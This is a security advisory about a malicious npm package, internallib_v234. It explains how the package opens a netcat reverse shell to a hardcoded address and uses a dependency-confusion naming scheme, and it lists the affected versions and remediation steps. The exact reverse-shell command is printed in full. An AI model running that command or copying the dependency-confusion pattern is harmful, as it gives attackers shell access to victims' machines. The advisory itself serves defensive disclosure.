npm · Malicious package advisory
Malwareinternallib_v234
MAL-2026-6796
Malicious code in internallib_v234 (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087) internallib_v234@1.0.6 exports a `command()` function whose body unconditionally invokes `/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"`, opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs `whereis nc` to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency (`internallib_v234: ^1.0.0`), and CI configuration references a private Verdaccio registry (`npm update --registry http://0.0.0.0:4873/`). The combination indicates a targeted attack against an organization that hosts a private `internallib_v234` internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.
Compromised versions (5)
- 1.0.3
- 1.0.5
- 1.0.6
- 1.0.7
- 1.0.4
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.